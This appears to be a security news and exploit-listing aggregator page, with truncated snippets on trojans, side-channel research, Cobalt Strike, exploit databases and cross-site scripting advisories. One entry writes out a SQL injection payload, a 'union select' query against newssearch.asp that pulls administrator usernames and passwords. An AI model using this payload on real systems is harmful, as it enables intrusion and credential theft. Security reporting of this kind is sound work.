Exploit-Framework

Exploit Framework !License: MIThttps://img.shields.io/bad...

CVE-s

It is an offensive tool for web exploitation. This repository ap...

New Cache Side Channel Attack Can De-Anonymize Targeted Online Users

A group of academics from the New Jersey Institute of Technology NJIT has warned of a novel technique that could be used to defeat anonymity protections and identify a unique website visitor. "An attacker who has complete or partial control over a website can learn whether a specific target i.e.,...

Web vulnerabilities exploit weekly digest #1. March 8-15th 2021. VMware vCenter and Apache OFBiz RCE.

Welcome to the Wallarm weekly web exploits digest! Since this week, we will publish our weekly digests consists of web exploits with CVSS scores higher than 5. It will be followed by explanations, risks analysis, related stories and news. So, here we go! The most sophisticated and interesting...

Qbot Trojan Reappears to Go After U.S. Banking Customers

Qbot, an ever-evolving information-stealing trojan that’s been around since 2008, has reappeared after a hiatus to target customers of U.S. financial institutions. Its latest variant features fresh capabilities to help it remain undetected. Qbot a.k.a. Qakbot or Pinkslipbot harvests browsing data...

penetration

This is a collection of 0-day exploits and vulnerabilities in various web applications, including CreateLive CMS, DVBBS, and others. The exploits are primarily SQL injection attacks, which allow an attacker to inject malicious SQL code into the database to extract or modify sensitive data. The...

USN-4202-1 thunderbird vulnerabilities

It was discovered that a specially crafted S/MIME message with an inner encryption layer could be displayed as having a valid signature in some circumstances, even if the signer had no access to the encrypted message. An attacker could potentially exploit this to spoof the message author...

Exploit for CVE-2013-0422

K8tools 20190428 声明: 工具仅供安全研究或授权渗透，非法用途后果自负。 博客: https://www.cnblogs.com/k8gege 下载: https://github.com/k8gege/K8tools PS: 不定期更新,文件比较大，可按需下载。工具有BUG或建议可直接Github上留言 提权工具均可在远控Cmd或WebShell运行，大部份经过修改编译兼容性稳定性更好 注意：不保证永久有效,喜欢自行保存。 综合工具 + 综合工具 K8飞刀Final.rar + K8data.mdb K8飞刀漏洞数据库20190402 + K8expList.txt...

Distributed Red Team Operations with Cobalt Strike

What if you could easily host malicious websites, send phishing emails, and manage compromised hosts across diverse internet addresses? This week's Cobalt Strike adds the ability to manage multiple attack servers at once. Here's how it works: When you connect to two or more servers, Cobalt Strike...

Bots, Zeus, Web Exploits: the Most Potent Threats of 2012

Every year it seems that security-related news advances further from its roots in national security circles, IT departments, and the antivirus industry into the mainstream consciousness. From July to the end of year was no exception. However, despite a handful of flashy security stories, F-Secure...

Russian Web proxy with backdoors, Distributing malware

Antivirus company Symantec has detected a malicious campaign in which hackers managed to deceive thousands of people allegedly signed by a paid proxy service. They expose that hundreds of thousands of users signing up for a cheap and supposedly legitimate proxy service have ended up downloading...

ActivaDigital Cross Site Scripting

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 1 1 /' \ /'\ /\ \ /'\ 0 0 /, \ /\/\ \ \ \ \ ,/\ /\ \ 1 1 //\ \ /' \ /\ //\ Exploit database separated by exploit 0 0 // type local, remote, DoS, etc. 1 1 1 0 x Official Website: http://www.1337day.com 0 1 x...

Nor-Rec Cross Site Scripting

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 1 1 /' \ /'\ /\ \ /'\ 0 0 /, \ /\/\ \ \ \ \ ,/\ /\ \ 1 1 //\ \ /' \ /\ //\ Exploit database separated by exploit 0 0 // type local, remote, DoS, etc. 1 1 1 0 x Official Website: http://www.1337day.com 0 1 x...

Southern data editor(southidceditor)injection 0day vulnerabilities-vulnerability warning-the black bar safety net

Injection point:newssearch. asp? key=7%' union select 0,username%2BCHR1 2 4%2Bpassword,2,3,4,5,6,7,8,9 from admin where 1 or '%'='&otype=title&Submit=%CB%D1%CB%F7 It may beanother versionnewssearch. asp? key=7%' union select 0,username%2BCHR1 2 4%2Bpassword,2,3,4,5,6,7,8,9,1 0 from admin where 1...

Hacked WordPress Blogs Used to Poison Google Image Search

A researcher has found evidence of thousands of compromised WordPress blogs that are being used to insert malicious images into Google search results. The report, from the unmaskparasites.com blog, may be evidence of the after affects of a widespread attack on WordPress blogs reported last week, ...

Roboo : Most Advanced open-source HTTP Robot mitigator !

Roboo uses advanced non-interactive HTTP challenge/response mechanisms to detect and subsequently mitigate HTTP robots, by verifying the existence of HTTP, HTML, DOM, Javascript and Flash stacks at the client side. Such deep level of verification weeds out the larger percentage of HTTP robots whi...

Cisco: More Threats To Apple, Mobile Devices In 2011

Data suggests that 2010 was a year of “more of the same” when it comes to computer threats, but 2011 likely won’t be, at least according to networking giant Cisco Systems, which released its Annual Security Report on Wednesday. Cisco’s annual report on the state of security reiterated findings fr...

New Firefox Plug-In Will Defeat Flash Attacks

For years now, Adobe Flash files have been a very useful attack vector for hackers and a serious security problem for end users and IT departments. Now, a German researcher is planning to unveil a new browser plug-in designed to prevent many common types of Flash attacks. The plug-in, called...

Dojo Toolkit 1.4.1 - dohrunner.html Multiple Cross-Site Scripting Vulnerabilities

Dojo Toolkit 1.4.1 - dohrunner.html Multiple Cross-Site Scripting Vulnerabilities source: https://www.securityfocus.com/bid/38739/info Dojo is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. An attacker may leverage these issues...

Cisco Defines Cybercrime ROI

The Cisco Cybercrime Return on Investment Matrix identifies the innovative and lucrative banking Trojan Zeus, as well as successful Web exploits that have dominated cybercrime as “rising stars.” Read the full article. TechTarget...